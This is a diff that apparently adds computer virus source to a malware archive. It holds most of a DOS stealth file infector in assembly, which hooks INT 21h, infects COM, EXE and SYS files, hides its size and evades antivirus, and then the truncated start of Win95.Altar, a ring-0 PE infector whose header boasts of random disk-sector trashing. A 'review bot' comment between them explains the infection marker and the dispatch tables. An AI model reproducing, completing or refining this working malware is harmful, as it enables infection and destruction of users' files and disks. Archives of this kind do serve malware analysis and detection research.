+foundcomspec: mov ax, 3D00h
+ lea dx, [si+8]
+ int 21h
+ xchg ax, bx
+ mov ah, 3Eh
+ int 21h
+restorehost: pop ax
+ mov ds, ax
+ mov es, ax
+ add ax, 10h
+ mov bx, ax
+ db 81h,0C3h
+savess dw 0FFF0h
+ cli
+ db 0BCh
+savesp dw 0FFFEh
+ mov ss, bx
+ db 5
+savecs dw 0FFF0h
+ mov cs:[bp+jumpsegment-getip], ax
+ cmp sp, 0FFFEh
+ jnz zeroregs
+ mov word ptr ds:100h, 20CDh
+first2 = $-2
+ mov byte ptr ds:102h, 90h
+next1 = $-1
+zeroregs: sub ax, ax
+ sub bx, bx
+ sub cx, cx
+ cwd
+ sub si, si
+ sub di, di
+ sub bp, bp
+ sti
+ jmp near ptr jumptohost
+ db 0EAh
+jumptohost db 0EAh
+saveip dw 100h
+jumpsegment dw 0
+restoresys: pop es
+ pop ds
+ mov word ptr [si+8], 0
+sysret2 = $-2
+ popa
+ popf
+ db 68h
+sysret dw 0
+ ret
+getmemory: call getlastmcb
+ mov ax, ds
+ mov bx, [si+3]
+ sub bx, dx
+ add ax, bx
+ xchg ax, cx
+ xchg ax, bx
+ jmp setnewmcbsize
+setlastmcbsize: call getlastmcb
+ dec ax ; ax=cs
+ mov cx, ax ; cx=ax
+sublastmcbseg: sub ax, bx ; ax=ax-lastmcbseg
+setnewmcbsize: dec ax
+ or di, di
+ jnz dontsetmcbsize
+ mov [si+3], ax
+dontsetmcbsize: ret
+modifytomseginpsp:
+ mov ah, 62h
+ int 21h
+ mov ds, bx
+ int 12h
+ shl ax, 6
+ sub ax, 87h
+ mov ds:2, ax
+hideourmem: call getlastmcb
+ add ax, dx ; ax=virusparasize+virusseg+1
+ jmp sublastmcbseg
+getlastmcb: push es
+ mov ah, 52h
+ int 21h
+ mov ds, es:[bx-2]
+ mov ax, 5802h
+ int 21h
+ cbw
+ push ax
+ mov ax, 5803h
+ mov bx, 1
+ int 21h ; set umb's as part of chain
+ sub si, si
+ mov di, si
+getlastmcbloop: call getnextmcb
+ jnz getlastmcbloop
+ pop bx
+ push ax
+ mov ax, 5803h
+ int 21h
+ pop bx
+ pop es
+ mov ax, cs
+ inc ax
+ mov dx, 87h ; 2160d / 10h
+ ret
+getnextmcb: cmp word ptr [si+10h], 20CDh
+ jnz checkiflast
+ cmp byte ptr [si+15h], 0EAh
+ jnz checkiflast
+ inc di
+checkiflast: cmp byte ptr [si], 5Ah ; 'Z'
+ jz islastblock
+ mov ax, ds
+ inc ax
+ add ax, [si+3]
+ mov ds, ax
+islastblock: ret
+newint21: db 0EBh
+virusactive db 4Ch
+ mov cs:saveds, ds
+ push cs
+ pop ds
+ mov savedi, di
+ mov di, offset saveds
+ mov byte ptr [di+virusactive-saveds], 4Ch
+ mov [di+savees-saveds], es
+ mov [di+saveax-saveds], ax
+ mov [di+savebx-saveds], bx
+ mov [di+savecx-saveds], cx
+ mov [di+savedx-saveds], dx
+ mov [di+savesi-saveds], si
+ mov [di+savebp-saveds], bp
+ push cs
+ pop es
+ mov di, offset functions
+ db 0B9h
+stealthmode dw 14h
+ xchg al, ah
+ xor al, 5Fh
+ cld
+ repne scasb
+ jnz exithandler
+ sub di, offset functions+1
+ shl di, 1
+ add di, offset functionoffsets
+ push offset exithandler
+ push word ptr [di]
+ jmp near ptr restoreregs
+exithandler: call restoreregsandsetvirusactive
+emulateoldkernal:
+ cmp ah, 6Ch
+savecmp = $-1
+ ja zeroal_iret
+ cli
+ db 0EAh
+kernaladdress dd 0FDC840FEh
+writeheader: mov ah, 40h
+ mov cx, 18h
+readwritefromsi:mov dx, si
+int21: cli
+ pushf
+ call cs:kernaladdress
+ ret
+zeroal_iret: mov al, 0
+ iret
+restoreregsandsetvirusactive:
+ call near ptr restoreregs
+setvirusactive: mov cs:virusactive, 0
+ ret
+memstealth: call setlastmcbsize ; 48h/49h/4Ah
+restoreregs: db 0B8h
+saveds dw 9850h
+ mov ds, ax
+ db 0B8h
+savees dw 6D8h
+ mov es, ax
+ db 0B8h
+saveax dw 4B00h
+ db 0BBh
+savebx dw 241h
+ db 0B9h
+savecx dw 209h
+ db 0BAh
+savedx dw 40E6h
+ db 0BEh
+savesi dw 0E4h
+ db 0BFh
+savedi dw 0
+ db 0BDh
+savebp dw 6914h
+ ret
+loc_0_272: mov dx, 3F5h
+ mov al, 4
+ mov ch, 4
+ out dx, al
+ loop $
+ mov ch, 4
+ out dx, al
+ loop $
+ in al, dx
+ test al, 40h
+ ret
+message db 002h,0E0h,052h,0BFh,0B4h,0B0h,0B8h,0BFh,0E0h,0ADh
+ db 0ACh,0AEh,0B7h,0B5h,0BBh,051h,0E0h,007h,0E0h,0BFh
+ db 09Ch,08Ah,09Fh,092h,09Dh,09Bh,09Ch,0E0h,0ACh,09Fh
+ db 09Dh,08Ch,097h,09Dh,09Fh,094h,0E0h,0AAh,097h,08Eh
+ db 09Fh,094h,0E0h,0B7h,093h,090h,094h,09Fh,092h,08Ch
+ db 0E0h,09Eh,087h,0E0h,0B2h,0BBh,0ABh,0AEh,0B1h,0BEh
+ db 0BFh,0ADh,0B8h,0BBh,0AEh,0D9h,0C7h,0CDh,0E0h,0D1h
+ db 0E0h,0B9h,09Bh,08Eh,093h,09Fh,092h,087h,0E0h,002h
+setnofilestealth:
+ mov byte ptr cs:stealthmode, 12h
+activate: ret
+ call clearscreen
+ mov ah, 2
+ mov bh, 0
+ mov dx, 0C00h
+ int 10h
+ mov si, offset message
+ mov cx, 4Eh
+displayloop: lods byte ptr cs:[si]
+ neg al
+ int 29h
+ loop displayloop
+ xor ax, ax
+ int 16h
+clearscreen: mov ax, 3
+ int 10h
+setnoactivate: mov byte ptr cs:activate, 0C3h
+ ret
+execute: call setfullstealth
+ call setnoactivate
+ cmp al, 1
+ mov al, 90h
+ call setdirstealth
+ jnz infectdx
+ mov ax, 3D02h
+ int 21h
+ jb ret3
+ xchg ax, bx
+ call disinfecthandle
+ mov ah, 3Eh
+ int 21h
+ mov byte ptr ds:activate, 90h
+ret3: ret
+infectsi: mov dx, si
+infectdx: cmp ax, 4300h
+ jz ret3
+ call sethandletozero
+ cmp ah, 3Dh
+ jnz dontsetfullstealth
+ call setfullstealth
+dontsetfullstealth:
+ mov si, dx
+ mov di, offset buffer
+ push cs
+ pop es
+copyname: lodsb
+ or al, al
+ jz namecopied
+ stosb
+ jmp copyname
+namecopied: stosb
+ mov cl, byte ptr cs:saveax+1
+ mov ax, [si-7]
+ mov bx, [si-0Bh]
+ cmp cl, 3Dh
+ jnz notopen
+ db 0EBh
+dontopenchklist db 16h
+ cmp ax, 5453h ; chkliST?
+ jnz notopen
+ cmp bx, 4B48h ; cHKlist?
+ jnz notopen
+ pop ax
+ call restoreregsandsetvirusactive
+ mov ax, 2
+ stc
+ retf 2
+notopen: cmp cl, 4Bh
+ jnz checkifavactive
+ mov cl, 16h
+ cmp ax, 5641h
+ jnz notmsavorcpav
+ mov cl, 0
+notmsavorcpav: mov cs:dontopenchklist, cl
+ cmp bx, 5343h
+ jz setmemstealthonly
+ cmp bx, 4142h
+ jz setmemstealthonly
+ cmp ax, 4148h
+ jz setmemstealthonly
+ cmp ax, 4A52h
+ jz setmemstealthonly
+ cmp word ptr [si-8], 495Ah
+ jnz leavestealthmode
+setmemstealthonly:
+ mov byte ptr cs:stealthmode, 8
+leavestealthmode:
+ push ax
+ mov ax, 160Ah
+ int 2Fh
+ cmp al, 0Ah
+ pop ax
+ jnz checkifavactive
+ cmp ax, 5641h
+ jz checkifavactive
+ cmp bx, 544Eh
+ jz checkifavactive
+ call hideourmem
+checkifavactive:
+ mov bx, 0FF0Fh
+ xchg ax, bx
+ int 21h
+ cmp al, 1
+ jz ret4
+ mov bl, 0
+ call vsafe
+ push cs
+ pop ds
+ mov ah, 2Fh
+ int 21h
+ push es
+ push bx
+ mov ah, 1Ah
+ mov dx, offset tempdta
+ int 21h
+ mov ax, 3524h
+ int 21h
+ push es
+ push bx
+ mov ah, 25h
+ mov dx, offset zeroal_iret
+ int 21h
+ mov ah, 4Eh
+ mov cl, 27h
+ call setdxtobuffer_int21
+ jb restoreint24anddta
+ mov si, offset header
+ sub di, di
+ mov al, [si+18h]
+ mov attribs, al
+ cmp byte ptr [si], 2
+ ja notdriveAorB
+ call loc_0_272
+ jz checkfiletype
+restoreint24anddta:
+ mov ax, 2524h
+ pop dx
+ pop ds
+ int 21h
+ mov ah, 1Ah
+ pop dx
+ pop ds
+ int 21h
+togglevsafe db 0B3h
+vsafestatus db 16h
+vsafe: mov ax, 0FA02h
+ mov dx, 5945h
+ int 16h
+ mov cs:vsafestatus, cl
+ret4: ret
+notdriveAorB: cmp [si+12h], di
+ jnz checkfiletype
+ cmp word ptr [si+10h], 2
+ jb restoreint24anddta
+ cmp byte ptr [si], 3
+ jb checkfiletype
+ mov ah, 2Ah
+ int 21h
+ sub cx, 7BCh
+ mov ax, [si+1Bh]
+ shr ax, 1
+ cmp ah, cl
+ jnz checkfiletype
+ shr ax, 4
+ and al, 0Fh
+ cmp al, dh
+ jz restoreint24anddta
+checkfiletype: mov bp, offset setcarry_ret
+ cmp word ptr [si+21h], 4254h ; TB*
+ jz restoreint24anddta
+ cmp word ptr [si+0Ch], 4F43h ; CO
+ jnz notcominfection
+ mov bp, offset infectcom
+notcominfection:cmp word ptr [si+1Eh], 0Bh
+ jb restoreint24anddta
+ cmp byte ptr [si+1Ch], 0C8h
+ jnb restoreint24anddta
+ mov al, [si+18h]
+ and al, 7
+ jz attributesok
+ sub cx, cx
+ call setattribs
+ jb restoreint24anddta
+attributesok: mov ax, 3D02h
+ call setdxtobuffer_int21
+ jb near ptr restoreattribs
+ xchg ax, bx
+ mov ah, 3Fh
+ mov cx, 19h
+ call readwritefromsi
+ mov ax, [si]
+ xchg al, ah
+ cmp ax, 4D5Ah
+ jnz notexeinfection
+ mov bp, offset infectexe
+ jmp notsysinfection
+notexeinfection:cmp ax, 0FFFFh
+ jnz notsysinfection
+ mov bp, offset infectsys
+notsysinfection:call bp
+ jb dontwriteheader
+ call writeheader
+dontwriteheader:mov ax, 5700h
+ mov cx, [si+19h]
+ mov dx, [si+1Bh]
+ inc ax
+ int 21h
+ mov ah, 3Eh
+ int 21h
+restoreattribs db 0B1h
+attribs db 20h
+ call setattribs
+ jmp restoreint24anddta
+setattribs: mov ax, 4301h
+setdxtobuffer_int21:
+ mov ch, 0
+ mov dx, offset buffer
+ jmp int21
+infectexe: cmp byte ptr [si+18h], 40h ;WINDOZE EXE ?
+ jz setcarry_ret
+ mov ax, [si+4]
+ dec ax
+ mov cx, 200h
+ mul cx
+ add ax, [si+2]
+ adc dx, di
+ cmp [si+1Dh], ax
+ jnz setcarry_ret
+ cmp [si+1Fh], dx
+ jz nointernaloverlays
+setcarry_ret: stc
+ ret
+nointernaloverlays:
+ mov ax, [si+0Eh]
+ mov ds:savess, ax
+ mov ax, [si+10h]
+ mov ds:savesp, ax
+ mov ax, [si+16h]
+ mov ds:savecs, ax
+ mov ax, [si+14h]
+ mov ds:saveip, ax
+ call appendvirus
+ jb exitinfectexe
+ mov ax, [si+8]
+ mov cl, 10h
+ mul cx
+ neg ax
+ not dx
+ add ax, [si+1Dh]
+ adc dx, di
+ add dx, [si+1Fh]
+ div cx
+ mov [si+16h], ax
+ mov [si+14h], dx
+ dec ax
+ mov [si+0Eh], ax
+ mov word ptr [si+10h], 9D2h
+ add word ptr [si+0Ah], 0ADh
+ mov ax, [si+1Dh]
+ mov dx, [si+1Fh]
+ add ax, virussize
+ adc dx, di
+ mov cx, 200h
+ div cx
+ inc ax
+ mov [si+4], ax
+ mov [si+2], dx
+ clc
+exitinfectexe: ret
+infectcom: cmp word ptr [si+1Eh], 0D6h
+ ja exitcominfect
+ mov ax, [si]
+ mov word ptr ds:first2, ax
+ mov al, [si+2]
+ mov byte ptr ds:next1, al
+ mov ax, 0FFF0h
+ mov ds:savecs, ax
+ mov ds:savess, ax
+ mov word ptr ds:saveip, 100h
+ mov word ptr ds:savesp, 0FFFEh
+ call appendvirus
+ jb exitcominfect
+ mov byte ptr [si], 0E9h
+ mov ax, -3 ;0FFFDh
+ add ax, [si+1Dh]
+ mov [si+1], ax
+ clc
+exitcominfect: ret
+infectsys: mov ax, [si+8]
+ mov word ptr ds:sysret, ax
+ mov word ptr ds:sysret2, ax
+ call appendvirus
+ jb ret5
+ mov ax, [si+1Dh]
+ add ax, offset sysentry
+ mov [si+8], ax
+ clc
+ret5: ret
+appendvirus: mov al, 2
+ call lseek
+ mov ah, 40h
+ mov cx, virussize
+ cwd
+ call int21
+ cmp ax, cx
+ stc
+ jnz ret1
+ add byte ptr [si+1Ch], 0C8h
+lseekstart: mov al, 0
+lseek: mov ah, 42h
+ cwd
+ mov cx, dx
+doint21: int 21h
+ret1: ret
+lseekbeforeend: mov ax, 4202h
+ mov cx, 0FFFFh
+ jmp doint21
+checkhandle: cmp bl, 5 ;LAME HANDLE CHEQ.
+ jb exittimestealth
+checkinfection: mov ax, 5700h
+ int 21h
+ jb exittimestealth
+ cmp dh, 0C8h
+exittimestealth:ret
+blocklseek: cmp al, 2
+ jnz ret1
+ call checkinfection
+ jb ret1
+ pop ax
+ call near ptr restoreregs
+ push cx
+ sub dx, virussize
+ sbb cx, 0
+ int 21h
+ pop cx
+ jmp setvirusactive_exit
+setnodirstealth:mov al, 0C3h
+setdirstealth: mov byte ptr cs:fcbdirstealth, al
+ ret
+fcbdirstealth: nop
+ inc sp
+ inc sp
+ int 21h
+ cmp al, 0FFh
+ jz setvirusactive_exit
+ pushf
+ push ax
+ call getdta
+ cmp byte ptr [bx], 0FFh
+ jnz notextended
+ add bx, 7
+notextended: cmp [bx+1Ah], al
+ jb exitdirstealth
+ sub [bx+1Ah], al
+ add bx, 3
+ jmp stealthdirsize
+getdta: mov ah, 2Fh
+ int 21h
+ mov al, 0C8h
+ push es
+ pop ds
+ ret
+asciidirstealth:inc sp
+ inc sp
+ int 21h
+ jb setvirusactive_exit
+ pushf
+ push ax
+ call getdta
+ cmp [bx+19h], al
+ jb exitdirstealth
+ sub [bx+19h], al
+stealthdirsize: cmp word ptr [bx+1Bh], 0Bh
+ jb exitdirstealth
+ sub word ptr [bx+1Ah], virussize
+ sbb word ptr [bx+1Ch], 0
+exitdirstealth: call restoreregs
+ pop ax
+ popf
+setvirusactive_exit:
+ call setvirusactive
+ jmp exitkeepflags
+readoldheader: mov al, 1
+ call lseek
+ push cs
+ pop ds
+ mov oldposlo, ax
+ mov oldposhi, dx
+ mov si, offset header
+ cmp handle, bl
+ jz ret0
+ mov dx, 0FFDFh
+ call lseekbeforeend
+ mov ah, 3Fh
+ mov cx, 21h
+ call readwritefromsi
+ mov handle, bl
+lseektooldpos: mov ax, 4200h
+ db 0B9h
+oldposhi dw 0
+ db 0BAh
+oldposlo dw 0
+ int 21h
+ret0: ret
+disinfecthandle:call checkhandle
+ jb ret0
+ push cx
+ push dx
+ call readoldheader
+ call lseekstart
+ call writeheader
+ mov dx, 0F830h ; -virussize
+ call lseekbeforeend
+ mov ah, 40h
+ sub cx, cx
+ int 21h
+ pop dx
+ pop cx
+ sub dh, 0C8h
+ mov ax, 5701h
+ int 21h
+ jmp lseektooldpos
+stealthread: mov bp, cx
+ call checkhandle
+ jb ret0
+ pop ax
+ call readoldheader
+ sub ax, [si+1Dh]
+ sbb dx, 0
+ sub dx, [si+1Fh]
+ js adjustread
+ call restoreregsandsetvirusactive
+ sub ax, ax
+ clc
+exitkeepflags: retf 2
+adjustread: add ax, bp
+ adc dx, 0
+ jnz bigread
+ sub bp, ax
+bigread: push bp
+ call near ptr restoreregs
+ pop cx
+ int 21h
+ pushf
+ push ax
+ jb exitstealthread
+ push ds
+ pop es
+ mov di, dx
+ push cs
+ pop ds
+ mov si, offset header
+ cmp oldposhi, 0
+ jnz exitstealthread
+ mov ax, oldposlo
+ cmp ax, 18h
+ jnb exitstealthread
+ add si, ax
+ add cx, ax
+ cmp cx, 18h
+ jbe moveit
+ sub ax, 18h
+ neg ax
+ xchg ax, cx
+moveit: cld
+ rep movsb
+exitstealthread:call restoreregsandsetvirusactive
+ pop ax
+popf_exitwithflags:
+ popf
+ jmp exitkeepflags
+gettimestealth: cmp byte ptr cs:stealthmode, 12h
+ jnz dotimestealth
+ cmp al, 0
+ jz ret2
+setfullstealth: mov byte ptr cs:stealthmode, 14h
+ ret
+dotimestealth: cmp al, 0
+ jnz settimestealth
+ inc sp
+ inc sp
+ int 21h
+ pushf
+ jb setvirusactive_exit1
+ call removemarkerfromdh
+setvirusactive_exit1:
+ call setvirusactive
+ jmp popf_exitwithflags
+settimestealth: call setfullstealth
+ mov ax, 5700h
+ int 21h
+ jb ret2
+ pop ax
+ cmp dh, 0C8h
+ call near ptr restoreregs
+ jb removemarkeranddoint21
+ cmp dh, 0C8h
+ jnb doint21andexit
+ add dh, 0C8h
+doint21andexit: int 21h
+ pushf
+ jmp setvirusactive_exit1
+removemarkeranddoint21:
+ call removemarkerfromdh
+ jmp doint21andexit
+removemarkerfromdh:
+ cmp dh, 0C8h
+ jb notmarked
+ sub dh, 0C8h
+notmarked: ret
+sethandletozero:mov cs:handle, 0
+ret2: ret
+; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fh
+functions db 013h ; 4Ch - prog terminate
+ db 017h ; 48h - create mem block
+ db 016h ; 49h - release memory
+ db 015h ; 4Ah - resize mem block
+ db 00Dh ; 52h - get SYSVARS
+ db 0B5h ; 0EAh - ALLOC HUGE SEG
+ db 06Dh ; 32h - GET DPB
+ db 014h ; 4Bh - program EXEC
+ db 062h ; 3Dh - open file
+ db 04Eh ; 11h - fcb FindFirst
+ db 04Dh ; 12h - fcb FindNext
+ db 011h ; 4Eh - ASCII FindFirst
+ db 010h ; 4Fh - ASCII FindNext
+ db 008h ; 57h - get/set file time
+ db 033h ; 6Ch - extended open
+ db 01Ch ; 43h - get/set attribs
+ db 061h ; 3Eh - handle close
+ db 01Fh ; 40h - handle write
+ db 01Dh ; 42h - lseek
+ db 060h ; 3Fh - handle read
+functionoffsets dw offset setnofilestealth
+ dw offset memstealth
+ dw offset memstealth
+ dw offset memstealth
+ dw offset hideourmem
+ dw offset modifytomseginpsp
+ dw offset setnodirstealth
+ dw offset execute
+ dw offset infectdx
+ dw offset fcbdirstealth
+ dw offset fcbdirstealth
+ dw offset asciidirstealth
+ dw offset asciidirstealth
+ dw offset gettimestealth
+ dw offset infectsi
+ dw offset infectdx
+ dw offset sethandletozero
+ dw offset disinfecthandle
+ dw offset blocklseek
+ dw offset stealthread
+
+header db 0CDh,020h,090h
+tempdta db 3Ch dup (0)
+buffer db 80h dup (0)
+handle db 0
+virussize = 7D0h
+ end virus_start
diff --git a/MSDOS/Virus.MSDOS.Unknown.altar.asm b/MSDOS/Virus.MSDOS.Unknown.altar.asm
new file mode 100644
index 00000000..5c2c5ec4
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.altar.asm
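Review bot: The two facts a detection or disinfection engineer needs from this listing — the infection marker and the meaning of the hook tables — are undocumented, and the header says so deliberately. `appendvirus` marks a file with `add byte ptr [si+1Ch], 0C8h`; given that `dontwriteheader` passes `[si+19h]` as CX and `[si+1Bh]` as DX to function 5701h, `[si+1Ch]` is the high byte of the date word, and `checkinfection`, `removemarkerfromdh` and `disinfecthandle` all test or strip the same 0C8h from DH, so I would put `; infection marker: 0C8h added to the high byte of the DOS date (DH of 5700h), i.e. year+100; stripped by removemarkerfromdh/disinfecthandle` above `appendvirus`. `functions` and `functionoffsets` are parallel tables indexed by where `repne scasb` stops in `newint21`, and `stealthmode` (14h, 12h or 8) is the CX count for that scan, so only the first N entries stay hooked and the entry order is load-bearing; a comment on `functionoffsets` such as `; parallel to functions; stealthmode = number of leading entries scanned, so order matters` would spare the next reader the trace through the dispatcher. `virussize = 7D0h` is also duplicated as the literal `0F830h ; -virussize` in `disinfecthandle`, which is worth a note since the two will silently drift apart if the size ever changes.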
@@ -0,0 +1,534 @@ +;============================================================================ +; +; +; NAME: Win95.Altar 1.01 +; OS: Windoze 95/98. +; TYPE: Parasitic resident (VxD) PE-infector. +; SIZE: Around 800 bytes. +; AUTHOR: T-2000 / Immortal Riot. +; E-MAIL: T2000_@hotmail.com +; DATE: June 1999. +; DESTRUCTIVE: Yeah. +; +; FEATURES: +; +; - Gains ring-0 by hacking an IDT-gate. +; - Hosts don't increase in size. +; - Payload: random sector-trashing. +; +; Here's some simple ring-0 VxD-virus, just to try-out the idea. The trash- +; chance was set rather high, just to fuck beginners :P +; +;============================================================================ + + + .386p + .MODEL FLAT + .CODE + + ORG 0 + +EXTRN ExitProcess:PROC + +IFSMgr EQU 0040h +GetHeap EQU 000Dh +UniToBCSPath EQU 0041h +InstallFileSystemAPIhook EQU 0067h +Ring0_FileIO EQU 0032h +IFSFN_OPEN EQU 36 +R0_WRITEFILE EQU 0D601h + +Virus_Size EQU (Virus_End-START) +Virus_Size_Mem EQU (End_Virus_Mem-START) + + +START: + PUSH (1000h+(Carrier-START)) +Host_EIP = DWORD PTR $-4 + + PUSHFD + PUSHAD + + CALL Get_Delta + + MOV EAX, EBP + + SUB EAX, 1000h ; Calculate base-address. +Virus_RVA = DWORD PTR $-4 + + ADD [ESP+(9*4)], EAX ; Add base to the EIP RVA. + + XOR EAX, EAX + + CALL Setup_SEH ; Bail-out without errors + ; under NT. + MOV ESP, [ESP+(2*4)] + + JMP Return_Host + +Setup_SEH: PUSH DWORD PTR FS:[EAX] + MOV FS:[EAX], ESP + + PUSH EAX ; Store IDT in EAX. + SIDT [ESP-2] + POP EAX + + LEA EBX, [EBP+(Ring0_Installation-START)] + + XCHG [EAX+(3*8)], BX ; Hack IDT-gate. + ROR EBX, 16 + XCHG [EAX+(3*8)+6], BX + + INT 3 + + MOV [EAX+(3*8)+6], BX ; Restore IDT-gate. + ROL EBX, 16 + MOV [EAX+(3*8)], BX + +Return_Host: XOR EAX, EAX ; Restore the original SEH. + + POP DWORD PTR FS:[EAX] + POP EAX + + POPAD + POPFD + + RET ; RETurn to our host. 
+ + +Copyright DB '[Altar] by T-2000 / Immortal Riot', 0 + + +VxD_Ring0_FileIO: + + INT 20h + DW Ring0_FileIO + DW IFSMgr + + RET + + +Ring0_Installation: + + PUSHFD + PUSHAD + + MOV EAX, DR2 ; Get DR2 in EAX. + + CMP AL, 'T' ; We're already resident? + JE Exit_R0_Inst + + LEA EDI, [EBP+(VxD_Ring0_FileIO-START)] + + MOV AX, 20CDh + STOSW + + MOV [EDI], 00400032h + + MOV [EDI+(VxD_Call_1-VxD_Ring0_FileIO)-2], AX + MOV [EDI+(VxD_Call_2-VxD_Ring0_FileIO)-2], AX + MOV [EDI+(VxD_Call_3-VxD_Ring0_FileIO)-2], AX + + MOV [EDI+(VxD_Call_1-VxD_Ring0_FileIO)], 0040000Dh + MOV [EDI+(VxD_Call_2-VxD_Ring0_FileIO)], 00400067h + MOV [EDI+(VxD_Call_3-VxD_Ring0_FileIO)], 00400041h + + PUSH Virus_Size_Mem ; Allocate memory from the + INT 20h ; global heap. + DW GetHeap + DW IFSMgr +VxD_Call_1 = $-6 + POP ECX + + OR EAX, EAX ; Error occurred? + JZ Exit_R0_Inst + + MOV ESI, EBP ; Copy us to VxD-memory. + MOV EDI, EAX + CLD + REP MOVSB + + MOV [EAX+(Busy_Switch-START)], ECX + + ADD EAX, (Ring0_Hook-START) + + PUSH EAX ; Insert our file-hook. + INT 20h + DW InstallFileSystemAPIhook + DW IFSMgr +VxD_Call_2 = $-6 + POP EBX + + XCHG ECX, EAX ; Error? + JECXZ Exit_R0_Inst + + MOV [EBX+(Prev_Handler-Ring0_Hook)], ECX + + MOV AL, 'T' ; Mark us as resident. + MOV DR2, EAX + +Exit_R0_Inst: POPAD + POPFD + + IRETD ; Back to our ring-3 part. + + +Ring0_Hook: + JMP $+666h +Busy_Switch = DWORD PTR $-4 + + PUSHFD + PUSHAD + + CALL Get_Delta + + MOV DWORD PTR [EBP+(Busy_Switch-START)], (JMP_Prev_Hook-Busy_Switch) - 4 + + CMP DWORD PTR [ESP+(9*4)+(2*4)], IFSFN_OPEN + JNE Exit_Infect + + CALL Get_Random + + CMP DL, 5 + JA Obtain_Name + + CALL Get_Random + + MOV AX, 0DE02h ; R0_WRITEABSOLUTEDISK + INC ECX + LEA ESI, [EBP+(Copyright-START)] + CALL VxD_Ring0_FileIO + +Obtain_Name: MOV EBX, [ESP+(9*4)+(6*4)] ; IOREQ-structure. + + MOV ESI, [EBX+(3*4)] ; Unicode-path. 
+ + CLD + LODSD + + PUSH DWORD PTR [ESP+(9*4)+(5*4)] + PUSH 259 + PUSH ESI + LEA ESI, [EBP+(ANSI_Target-START)] + PUSH ESI + INT 20h + DW UniToBCSPath + DW IFSMgr +VxD_Call_3 = $-6 + + ADD ESP, (4*4) ; Fix stack. + + OR EDX, EDX ; No problems during the + JNZ Exit_Infect ; conversion? + + MOV [ESI+EAX], DL + + CMP [ESI+EAX-4], 'EXE.' ; Standard .EXE-file? + JNE Exit_Infect + + XOR EAX, EAX ; R0_OPENCREATFILE + MOV AH, 0D5h + PUSH 02h + POP EBX + INC EDX + CALL VxD_Ring0_FileIO + JC Exit_Infect + + XCHG EBX, EAX ; Save filehandle in EBX. + + XOR EAX, EAX ; R0_GETFILESIZE + MOV AH, 0D8h + CALL VxD_Ring0_FileIO + + CMP EAX, 4096 ; Avoid infecting files which +JC_Close_File: JB Close_File ; are too small. + + MOV [EBP+(Victim_Size-START)], EAX + + LEA EDI, [EBP+(Header-START)] + + ; Read-in the DOS MZ-header. + + XOR EAX, EAX ; R0_READFILE + MOV AH, 0D6h + PUSH 40h + POP ECX + XOR EDX, EDX + MOV ESI, EDI + CALL VxD_Ring0_FileIO + JC JC_Close_File + + CMP [EDI.MZ_Mark], 'ZM' ; It's a valid .EXE-file? + JNE Close_File + + MOV EDX, [EDI+3Ch] ; Pointer to PE-header. + + MOV [EBP+(PE_Header_Offs-START)], EDX + + ; Read-in PE-header. + + XOR EAX, EAX ; R0_READFILE + MOV AH, 0D6h + PUSH 92 + POP ECX + CALL VxD_Ring0_FileIO + + CMP [EDI.PE_Mark], 'EP' ; Verify the PE-header. + JNE Close_File + + CMP [EDI.PE_Checksum], -666h ; Avoid infected + JE Close_File ; files. + + MOVZX EAX, [EDI.Object_Count] + DEC EAX + PUSH 40 + POP ECX + MUL ECX + + MOVZX DX, [EDI.NT_Header_Size] + + LEA EDX, [EDX+24+EAX] + + ADD EDX, [EBP+(PE_Header_Offs-START)] + + MOV [EBP+(Last_Obj_Offset-START)], EDX + + ; Read-in the last object-header. 
+ + XOR EAX, EAX ; R0_READFILE + MOV AH, 0D6h + PUSH 40 + POP ECX + LEA ESI, [EBP+(Last_Obj_Table-START)] + CALL VxD_Ring0_FileIO + + MOV EAX, [ESI.Section_Physical_Size] + + CMP EAX, [ESI.Section_Virtual_Size] + JBE Check_Size + + MOV EAX, [ESI.Section_Virtual_Size] + +Check_Size: PUSH EAX + + MOV ECX, Virus_Size + + ADD EAX, ECX + ADD EAX, [ESI.Section_Physical_Offset] + + CMP EAX, 12345678h ; File increases in size? +Victim_Size = DWORD PTR $-4 + + POP EAX + + JA Close_File ; Then abort the infect. + + PUSH EAX + + PUSH EAX + + ADD EAX, ECX + + PUSH EAX + + MOV ECX, [EDI.File_Align] + CALL Align_EAX + + CMP [ESI.Section_Physical_Size], EAX + JNB Calc_New_Virt + + MOV [ESI.Section_Physical_Size], EAX + +Calc_New_Virt: POP EAX + MOV ECX, [EDI.Object_Align] + CALL Align_EAX + + CMP [ESI.Section_Virtual_Size], EAX + JNB Set_New_EIP + + ADD [EDI.Image_Size], EAX + + XCHG [ESI.Section_Virtual_Size], EAX + + SUB [EDI.Image_Size], EAX + +Set_New_EIP: POP EAX + + ADD EAX, [ESI.Section_RVA] + + MOV [EBP+(Virus_RVA-START)], EAX + + XCHG [EDI.EIP_RVA], EAX + + MOV [EBP+(Host_EIP-START)], EAX + + ; Write updated object-header back to disk. + + MOV EAX, R0_WRITEFILE + PUSH 40 + POP ECX + MOV EDX, 12345678h +Last_Obj_Offset = DWORD PTR $-4 + CALL VxD_Ring0_FileIO + + POP EDX + + ; Insert virus-body into our victim. + + MOV EAX, R0_WRITEFILE + MOV ECX, Virus_Size + ADD EDX, [ESI.Section_Physical_Offset] + MOV ESI, EBP + CALL VxD_Ring0_FileIO + + ; Mark file as infected. + + MOV [EDI.PE_Checksum], -666h + + ; Write updated PE-header back to disk. + + MOV EAX, R0_WRITEFILE + PUSH 92 + POP ECX + MOV EDX, 12345678h +PE_Header_Offs = DWORD PTR $-4 + MOV ESI, EDI + CALL VxD_Ring0_FileIO + + ; Close the file. + +Close_File: XOR EAX, EAX ; R0_CLOSEFILE + MOV AH, 0D7h + CALL VxD_Ring0_FileIO + +Exit_Infect: XOR EAX, EAX ; Reset busy-flag. 
